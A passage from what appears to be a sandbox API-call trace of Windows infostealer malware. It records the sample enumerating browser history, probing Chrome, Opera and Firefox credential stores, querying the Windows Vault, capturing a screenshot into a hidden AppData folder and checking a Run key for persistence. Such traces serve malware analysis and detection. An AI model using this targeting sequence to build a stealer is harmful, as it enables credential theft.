pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.889] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.889] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.889] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.890] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.890] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.890] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.891] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.891] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.891] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.891] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.892] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.892] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.892] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.892] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.893] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.893] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.894] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.895] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.895] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.895] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.895] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.895] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.895] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.896] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.896] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.896] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.896] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.896] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.896] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.897] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.897] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.897] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.897] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.897] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.898] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.898] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.898] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.898] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.899] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.899] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.900] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.900] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.900] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.900] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.900] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.901] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.901] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.901] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.901] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.901] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.901] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.902] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x1) returned 0x0 [0243.902] IEnumSTATURL:Next (in: This=0x436b20, celt=0x1, rgelt=0x19dafc, pceltFetched=0x19db44*=0x1 | out: rgelt=0x19dafc, pceltFetched=0x19db44*=0x0) returned 0x1 [0243.902] IUnknown:Release (This=0x436b20) returned 0x0 [0243.902] IUnknown:Release (This=0x4368d8) returned 0x1 [0243.902] CoUninitialize () [0243.911] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19db70, Length=0x800, ResultLength=0x19ea28 | out: KeyValueInformation=0x19db70, ResultLength=0x19ea28) returned 0x8000001a [0243.912] NtClose (Handle=0x104) returned 0x0 [0243.912] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x3160020) returned 1 [0243.924] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x7374) returned 0x467688 [0243.928] NtCreateKey (in: KeyHandle=0x19e98c, DesiredAccess=0x20219, ObjectAttributes=0x19e804*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e98c*=0x0) returned 0xc0000022 [0243.929] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x19e53c | out: Value="C:\\Program Files (x86)") returned 0x0 [0243.929] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0x19e510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.929] NtCreateFile (in: FileHandle=0x19e530, DesiredAccess=0x120089, ObjectAttributes=0x19e4f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e518, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e530*=0x0, IoStatusBlock=0x19e518*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0243.929] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0243.929] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0x19e510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.929] NtCreateFile (in: FileHandle=0x19e530, DesiredAccess=0x120089, ObjectAttributes=0x19e4f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e518, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e530*=0x0, IoStatusBlock=0x19e518*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0243.930] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0243.930] NtCreateKey (in: KeyHandle=0x19e984, DesiredAccess=0x20219, ObjectAttributes=0x19e7fc*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e984*=0x0) returned 0xc0000022 [0243.930] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0x19e534 | out: Value="C:\\Program Files (x86)") returned 0x0 [0243.930] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0x19e508, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.930] NtCreateFile (in: FileHandle=0x19e528, DesiredAccess=0x120089, ObjectAttributes=0x19e4f0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e510, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e528*=0x0, IoStatusBlock=0x19e510*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0243.930] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0243.930] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0x19e508, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.930] NtCreateFile (in: FileHandle=0x19e528, DesiredAccess=0x120089, ObjectAttributes=0x19e4f0*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e510, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e528*=0x0, IoStatusBlock=0x19e510*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0243.930] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0243.930] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x467688) returned 1 [0243.931] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0x19e5ec | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0243.932] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0x19e5c0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.932] NtCreateFile (in: FileHandle=0x19e5e0, DesiredAccess=0x120089, ObjectAttributes=0x19e5a8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e5c8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e5e0*=0x0, IoStatusBlock=0x19e5c8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0243.932] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0243.932] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x19e53c | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0243.932] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0x19e520, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.932] NtCreateFile (in: FileHandle=0x19e540, DesiredAccess=0x120089, ObjectAttributes=0x19e508*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e528, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e540*=0x0, IoStatusBlock=0x19e528*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0243.932] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0243.932] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="vaultcli.dll", BaseAddress=0x19e764 | out: BaseAddress=0x19e764*=0x752e0000) returned 0x0 [0244.439] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x19e634, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0244.439] NtCreateFile (in: FileHandle=0x19e654, DesiredAccess=0x120089, ObjectAttributes=0x19e61c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e63c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e654*=0x0, IoStatusBlock=0x19e63c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0244.439] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0244.439] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x19e64c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0244.439] NtCreateFile (in: FileHandle=0x19e66c, DesiredAccess=0x12019f, ObjectAttributes=0x19e634*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e654, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e66c*=0x13c, IoStatusBlock=0x19e654*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0244.441] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0244.441] NtQueryInformationFile (in: FileHandle=0x13c, IoStatusBlock=0x19e654, FileInformation=0x19e5ac, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19e654, FileInformation=0x19e5ac) returned 0x0 [0244.441] NtWriteFile (in: FileHandle=0x13c, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19e654, Buffer=0x422670*, Length=0x28, ByteOffset=0x19e5c4*=0, Key=0x0 | out: IoStatusBlock=0x19e654, Buffer=0x422670*) returned 0x0 [0244.442] NtClose (Handle=0x13c) returned 0x0 [0244.443] VaultEnumerateVaults () returned 0x0 [0245.203] VaultOpenVault () returned 0x0 [0245.209] VaultEnumerateItems () returned 0x0 [0245.210] VaultFree () returned 0x0 [0245.210] VaultCloseVault () returned 0x0 [0245.210] VaultOpenVault () returned 0x0 [0245.211] VaultEnumerateItems () returned 0x0 [0245.215] VaultFree () returned 0x0 [0245.215] VaultCloseVault () returned 0x0 [0245.216] VaultFree () returned 0x1 [0245.217] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="gdiplus.dll", BaseAddress=0x19e620 | out: BaseAddress=0x19e620*=0x729e0000) returned 0x0 [0245.287] GetDC (hWnd=0x0) returned 0x34010b12 [0245.287] CreateCompatibleDC (hdc=0x34010b12) returned 0x6010ba5 [0245.287] GetSystemMetrics (nIndex=0) returned 1440 [0245.287] GetSystemMetrics (nIndex=1) returned 900 [0245.287] CreateCompatibleBitmap (hdc=0x34010b12, cx=1440, cy=900) returned 0xb050b66 [0245.322] SelectObject (hdc=0x6010ba5, h=0xb050b66) returned 0x185000f [0245.322] BitBlt (hdc=0x6010ba5, x=0, y=0, cx=1440, cy=900, hdcSrc=0x34010b12, x1=0, y1=0, rop=0xcc0020) returned 1 [0245.340] GdiplusStartup (in: token=0x19e9f4, input=0x19e9c0, output=0x0 | out: token=0x19e9f4, output=0x0) returned 0x0 [0245.346] GdipCreateBitmapFromHBITMAP (hbm=0xb050b66, hpal=0x0, bitmap=0x19e9f0) returned 0x0 [0245.415] GdipGetImageEncodersSize (numEncoders=0x19e68c, size=0x19e688) returned 0x0 [0245.416] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x410) returned 0x44e1e8 [0245.417] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x44e1e8 | out: encoders=0x44e1e8) returned 0x0 [0245.417] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x44e1e8) returned 1 [0245.417] GdipSaveImageToFile (image=0x31e2230, filename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", clsidEncoder=0x19e9b0*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0245.486] GdiplusShutdown (token=0x1cd02b7) [0245.516] DeleteObject (ho=0xb050b66) returned 1 [0245.516] DeleteObject (ho=0x6010ba5) returned 1 [0245.517] ReleaseDC (hWnd=0x0, hDC=0x34010b12) returned 1 [0245.522] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0245.522] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0245.522] NtClose (Handle=0x14c) returned 0x0 [0245.522] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.522] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.522] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.522] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0245.523] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0245.523] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0245.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0245.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, 